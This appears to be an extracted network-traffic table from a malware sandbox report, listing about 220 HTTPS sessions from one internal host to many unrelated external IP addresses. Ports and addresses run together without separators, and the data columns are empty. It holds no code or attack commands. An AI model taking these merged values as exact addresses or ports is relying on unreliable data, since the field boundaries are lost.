                                          13981192.168.2.2350062180.145.174.26443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13982192.168.2.2346908208.129.134.254443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13983192.168.2.234805062.141.202.84443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13984192.168.2.2338902119.42.231.156443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13985192.168.2.2352752115.251.117.163443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13986192.168.2.234159437.37.186.13443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13987192.168.2.2354082193.105.189.102443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13988192.168.2.2348996176.8.29.25443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13989192.168.2.2344808128.212.173.65443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13990192.168.2.2348944184.130.77.111443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13991192.168.2.234864654.229.52.26443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13992192.168.2.2333074177.232.238.64443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13993192.168.2.2357120157.96.201.70443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13994192.168.2.234817697.188.89.196443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13995192.168.2.2347484200.101.4.144443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13996192.168.2.2354452177.98.172.106443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13997192.168.2.235145894.211.211.78443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13998192.168.2.2347688101.169.207.79443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13999192.168.2.2342324133.240.165.212443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14000192.168.2.233366278.116.80.187443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14001192.168.2.2336268143.210.123.12443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14002192.168.2.2358880168.129.184.42443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14003192.168.2.234730671.7.131.28443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14004192.168.2.235589063.118.31.20443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14005192.168.2.2344922131.63.232.130443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14006192.168.2.2333656133.83.249.22443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14007192.168.2.233801299.187.46.17443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14008192.168.2.2343024203.64.157.179443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14009192.168.2.2354192166.15.213.107443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14010192.168.2.233618836.187.31.55443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14011192.168.2.235314454.117.72.61443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14012192.168.2.2347340143.126.70.73443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14013192.168.2.2342118147.241.75.44443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14014192.168.2.2338528219.189.220.93443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14015192.168.2.233804887.129.63.64443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14016192.168.2.2336804111.176.60.246443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14017192.168.2.2345698131.234.147.173443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14018192.168.2.2360008114.116.187.98443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14019192.168.2.234730050.104.150.54443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14020192.168.2.2347054121.101.39.210443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14021192.168.2.2357994189.78.237.132443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14022192.168.2.235754284.241.104.173443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14023192.168.2.2355190105.179.149.102443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14024192.168.2.235620275.217.164.9443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14025192.168.2.233281670.180.214.187443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14026192.168.2.23546562.186.175.206443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14027192.168.2.2333264218.197.133.236443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14028192.168.2.2347826106.11.138.63443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14029192.168.2.2353582106.138.173.166443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14030192.168.2.2360762142.61.42.163443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14031192.168.2.2352070100.53.0.33443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14032192.168.2.235829482.80.61.33443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14033192.168.2.233482487.80.123.250443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14034192.168.2.2357740218.7.193.19443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14035192.168.2.235991087.137.178.77443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14036192.168.2.234859834.244.144.27443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14037192.168.2.2346064137.45.175.137443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14038192.168.2.234795283.250.75.168443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14039192.168.2.2341464220.232.228.108443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14040192.168.2.2351360134.126.233.8443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14041192.168.2.2345334201.59.62.32443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14042192.168.2.234196076.243.64.150443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14043192.168.2.2345992162.197.13.147443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14044192.168.2.235234648.157.105.86443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14045192.168.2.233801065.18.137.233443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14046192.168.2.233352481.142.136.51443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14047192.168.2.235732850.246.244.61443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14048192.168.2.2345814220.115.186.153443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14049192.168.2.234887264.203.92.9443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14050192.168.2.233836057.50.161.160443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14051192.168.2.234228484.113.205.253443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14052192.168.2.234722258.59.111.72443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14053192.168.2.233767878.44.93.245443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14054192.168.2.234834879.9.126.8443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14055192.168.2.234642653.153.110.214443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14056192.168.2.235348092.110.98.25443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14057192.168.2.235494440.110.102.148443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14058192.168.2.2359268186.107.70.238443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14059192.168.2.2333034220.83.134.34443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14060192.168.2.235218676.106.52.230443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14061192.168.2.2343706167.118.192.221443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14062192.168.2.235075418.200.241.250443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14063192.168.2.2354896113.181.57.179443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14064192.168.2.234652674.59.6.170443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14065192.168.2.235275823.28.166.149443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14066192.168.2.234966034.52.129.58443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14067192.168.2.2339910109.102.248.243443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14068192.168.2.2336450137.187.170.159443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14069192.168.2.2334188140.5.112.210443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14070192.168.2.2346176134.140.31.82443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14071192.168.2.234114027.72.97.250443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14072192.168.2.235814846.16.220.246443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14073192.168.2.2333998178.192.146.97443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14074192.168.2.233577249.201.121.190443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14075192.168.2.2338580198.211.19.1443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14076192.168.2.2338166100.239.152.185443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14077192.168.2.233861052.42.72.159443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14078192.168.2.235404476.13.83.247443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14079192.168.2.2353220131.60.86.2443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14080192.168.2.234283049.250.133.180443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14081192.168.2.235586889.216.141.97443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14082192.168.2.235678446.169.79.191443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14083192.168.2.23556968.81.222.18443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14084192.168.2.2335954199.107.50.181443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14085192.168.2.2337092180.118.57.53443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14086192.168.2.2340028188.206.197.193443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14087192.168.2.2341572170.185.149.121443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14088192.168.2.2335800138.219.202.191443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14089192.168.2.2335290168.254.20.252443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14090192.168.2.233359839.11.86.25443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14091192.168.2.234769635.131.31.115443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14092192.168.2.2340256132.115.177.194443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14093192.168.2.2345854186.190.125.34443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14094192.168.2.2341692140.247.140.124443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14095192.168.2.234132081.201.31.22443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14096192.168.2.2359404197.6.75.213443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14097192.168.2.233669835.168.19.37443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14098192.168.2.235382824.136.88.99443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14099192.168.2.2344256188.98.214.108443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14100192.168.2.2340916159.106.136.99443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14101192.168.2.2333574134.159.28.131443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14102192.168.2.235263466.49.90.28443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14103192.168.2.2351908170.91.30.65443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14104192.168.2.2335384198.9.236.33443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14105192.168.2.235657492.78.52.124443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14106192.168.2.2334788106.173.166.73443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14107192.168.2.2360348104.66.163.107443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14108192.168.2.2355998134.80.202.54443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14109192.168.2.2357248147.97.185.47443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14110192.168.2.2354564182.123.67.166443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14111192.168.2.2356238131.135.149.147443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14112192.168.2.2354644134.245.51.218443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14113192.168.2.2349886200.233.139.253443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14114192.168.2.2345130157.231.173.205443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14115192.168.2.2359212220.90.145.120443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14116192.168.2.2341132149.88.194.248443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14117192.168.2.235045073.50.194.106443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14118192.168.2.2340200135.240.115.25443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14119192.168.2.235801448.250.24.228443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14120192.168.2.2343782158.241.92.59443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14121192.168.2.2355158124.197.95.67443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14122192.168.2.235019013.199.59.77443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14123192.168.2.235556898.172.157.254443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14124192.168.2.23444124.65.38.66443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14125192.168.2.2342738102.170.96.123443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14126192.168.2.2340450148.223.197.193443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14127192.168.2.235026864.170.228.235443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14128192.168.2.235568068.244.209.109443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14129192.168.2.2360734198.73.163.154443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14130192.168.2.2343456185.55.209.192443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14131192.168.2.2333420216.36.82.226443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14132192.168.2.233604057.122.104.212443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14133192.168.2.2352740150.51.157.199443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14134192.168.2.2347180193.77.224.58443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14135192.168.2.2342524120.22.6.82443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14136192.168.2.2348094194.13.181.55443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14137192.168.2.2356666138.70.80.82443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14138192.168.2.2352218175.4.11.36443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14139192.168.2.2339112144.203.129.30443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14140192.168.2.2350930210.104.67.198443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14141192.168.2.2351242208.116.207.221443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14142192.168.2.2335930191.7.34.253443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14143192.168.2.235571236.87.107.138443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14144192.168.2.234770485.117.28.235443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14145192.168.2.2342908175.142.3.134443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14146192.168.2.2357766151.41.201.132443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14147192.168.2.2341092217.107.114.65443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14148192.168.2.235684078.73.231.186443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14149192.168.2.233979231.208.85.63443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14150192.168.2.234756454.126.151.206443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14151192.168.2.233884241.178.44.68443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14152192.168.2.2340844128.131.251.57443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14153192.168.2.2339548192.96.51.118443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14154192.168.2.2347624201.77.118.40443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14155192.168.2.2353534143.25.203.81443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14156192.168.2.2332784196.207.161.6443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14157192.168.2.2345542164.33.33.14443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14158192.168.2.234656663.158.230.191443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14159192.168.2.2355230206.193.175.248443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14160192.168.2.2337442159.135.181.96443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14161192.168.2.2348316110.27.247.156443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14162192.168.2.2344868176.70.194.217443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14163192.168.2.233548287.209.7.49443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14164192.168.2.2360276123.128.114.125443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14165192.168.2.234705680.111.21.87443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14166192.168.2.2347154167.95.248.158443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14167192.168.2.2338036112.149.165.230443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14168192.168.2.2348144157.187.51.206443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14169192.168.2.235259250.177.12.49443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14170192.168.2.235545859.200.81.89443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14171192.168.2.233701032.139.106.219443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14172192.168.2.2344386131.223.228.109443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14173192.168.2.2350892223.232.193.130443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14174192.168.2.234120238.124.167.64443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14175192.168.2.235709895.209.188.122443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14176192.168.2.2344470169.57.208.91443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14177192.168.2.2348282128.234.51.40443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14178192.168.2.233965496.253.213.83443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14179192.168.2.2337056196.218.148.159443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14180192.168.2.2360942170.148.154.6443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14181192.168.2.2343092175.33.251.187443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14182192.168.2.2336906153.74.104.7443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14183192.168.2.2355054177.167.38.114443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14184192.168.2.234838687.50.110.171443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14185192.168.2.2336664208.153.10.41443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14186192.168.2.235091649.140.204.215443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14187192.168.2.234042280.11.59.140443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14188192.168.2.2358460183.254.241.151443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14189192.168.2.233727277.170.108.108443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14190192.168.2.2341642160.23.213.249443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14191192.168.2.234152698.21.99.240443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14192192.168.2.233426825.63.116.96443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14193192.168.2.2333940137.195.17.3443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14194192.168.2.2343014158.138.215.245443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14195192.168.2.235703870.25.221.76443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14196192.168.2.234972471.69.182.4443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14197192.168.2.233967834.82.228.231443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14198192.168.2.2343258116.148.101.26443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14199192.168.2.233936048.37.90.24443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14200192.168.2.2337698141.126.199.145443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14201192.168.2.234132691.160.91.206443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14202192.168.2.234369836.158.56.2443
                                          TimestampBytes transferredDirectionData


